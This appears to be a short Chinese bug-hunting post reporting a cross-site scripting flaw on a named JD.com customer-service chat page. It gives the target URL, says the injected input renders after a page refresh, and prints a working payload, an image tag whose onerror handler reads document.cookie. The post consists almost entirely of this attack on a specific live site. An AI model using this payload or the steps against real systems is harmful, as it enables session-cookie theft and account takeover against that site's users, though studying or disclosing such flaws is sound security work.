@1kbfree
2018-10-12T18:20:35.000000Z
字数 153
阅读 2239
漏洞挖掘
1、打开Url:https://jtalk.jd.com/?entrance=10001&source=web&companyId=1
输入xss payload然后刷新一下,可以解析,如图
xss payload
<img/src='x'/onerror=(alert)(document.cookie)>